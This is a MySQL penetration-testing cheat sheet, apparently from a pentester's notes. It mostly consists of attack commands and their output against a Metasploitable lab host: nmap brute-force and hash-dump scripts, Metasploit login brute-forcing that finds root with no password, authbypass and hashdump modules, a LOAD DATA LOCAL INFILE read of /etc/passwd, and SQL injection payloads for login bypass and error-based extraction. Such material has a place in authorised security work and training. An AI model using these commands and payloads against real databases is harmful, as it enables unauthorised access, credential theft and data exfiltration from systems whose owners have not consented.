
3306 - Pentesting MySQL

MySQL is a popular open-source relational database management system (RDBMS). It is used for storing, organizing, and retrieving large amounts of data in a structured manner. MySQL is known for its reliability, flexibility, and performance, making it suitable for a wide range of applications, including web-based applications, data warehousing, and business intelligence.

nmap


sudo nmap -Pn -sV -sC -vv -p 3306 $IP
sudo nmap -vv -p 3306 --script=mysql-enum $IP
sudo nmap -vv -p 3306 --script=mysql-audit $IP
sudo nmap -vv -p 3306 --script=mysql-brute $IP
sudo nmap -vv -p 3306 --script=mysql-databases $IP
sudo nmap -vv -p 3306 --script=mysql-dump-hashes $IP --script-args='username=root,password=password'
sudo nmap -vv -p 3306 --script=mysql-empty-password $IP
sudo nmap -vv -p 3306 --script=mysql-info $IP
sudo nmap -vv -p 3306 --script=mysql-query $IP
sudo nmap -vv -p 3306 --script=mysql-users $IP
sudo nmap -vv -p 3306 --script=mysql-variables $IP
sudo nmap -vv -p 3306 --script=mysql-vuln-cve2012-2122 $IP

metasploit


version

use auxiliary/scanner/mysql/mysql_version
set RHOSTS 10.0.2.8
run
|->
10.0.2.8:3306 is running MySQL 5.0.51a-3ubuntu5
enumerating
use auxiliary/admin/mysql/mysql_enum
set RHOSTS 10.0.2.8
run
|->
MySQL Version: 5.0.51a-3ubuntu5      
Compiled for the following OS: debian-linux-gnu
Architecture: i486                                             
Server Hostname: metasploitable                              
Data Directory: /var/lib/mysql/      
Logging of queries and logins: OFF         
Old Password Hashing Algorithm OFF                           
Loading of local files: ON                  
Deny logins with old Pre-4.1 Passwords: OFF
Allow Use of symlinks for Database Files: YES                
Allow Table Merge: YES                      
SSL Connections: Enabled                            
SSL CA Certificate: /etc/mysql/cacert.pem
SSL Key: /etc/mysql/server-key.pem          
SSL Certificate: /etc/mysql/server-cert.pem    
files enum
use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS 10.0.2.8
set FILE_LIST /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
run
|->
/etc/passwd is a file and exists
/etc/hosts is a file and exists
login bruteforce
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.0.2.8
set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
run
|->
10.0.2.8:3306 - Success: 'root:'
other

  • msf> use auxiliary/admin/mysql/mysql_sql
  • msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
  • msf> use auxiliary/scanner/mysql/mysql_hashdump -> Creds
  • msf> use auxiliary/scanner/mysql/mysql_schemadump -> Creds
  • msf> use exploit/windows/mysql/mysql_start_up -> Execute commands Windows, Creds

mysql client


install mysql client

sudo apt install default-mysql-client
local
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
mysql --user=root --password=password
non-interactive mode - just execute a query (note: a password given on the command line is visible in the process list and shell history; the mysql client itself warns about this, so prefer an interactive prompt or an option file when possible)
mysql --user="drifter" --password="imjustdrifting31" -e "show databases"
mysql --user="drifter" --password="imjustdrifting31" -D "textpattern_db" -e "show tables"
remote
mysql -h $IP -u root
mysql -h $IP -u root@localhost
mysql -h $IP --user=root --password=password
remote + proxychains
proxychains -q mysql -h $IP

mysql commands


show databases;
use <database-name>;
show tables;
select * from <table-name>
mysql arbitrary file read via the client (only works when loading of local files is enabled, cf. the "Loading of local files: ON" line in the mysql_enum output above)
mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

sql injection


x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
version
SELECT @@version
tables
SELECT null,table_name,null FROM information_schema.tables WHERE table_schema = 'sqli_one'
SELECT null,GROUP_CONCAT(DISTINCT CONCAT(table_name)),null FROM information_schema.tables WHERE table_schema = 'sqli_one'
columns
SELECT null,column_name,null FROM information_schema.columns WHERE table_name = 'staff_users'
get a value via an error message (extractvalue)
SELECT null, extractvalue(1, concat('=', 'That will be returned as error')),null
SELECT null, extractvalue(1, concat('=', (SELECT GROUP_CONCAT(DISTINCT CONCAT(table_name)) FROM information_schema.tables WHERE table_schema = 'sqli_one'))),null

function

Name - Description
BENCHMARK() Repeatedly execute an expression
CHARSET() Return the character set of the argument
COERCIBILITY() Return the collation coercibility value of the string argument
COLLATION() Return the collation of the string argument
CONNECTION_ID() Return the connection ID (thread ID) for the connection
CURRENT_USER() , CURRENT_USER The authenticated user name and host name
DATABASE() Return the default (current) database name
FOUND_ROWS() For a SELECT with a LIMIT clause, the number of rows that would be returned were there no LIMIT clause
LAST_INSERT_ID() Value of the AUTOINCREMENT column for the last INSERT
ROW_COUNT() The number of rows updated
SCHEMA() Synonym for DATABASE()
SESSION_USER() Synonym for USER()
SYSTEM_USER() Synonym for USER()
USER() The user name and host name provided by the client
VERSION() Return a string that indicates the MySQL server version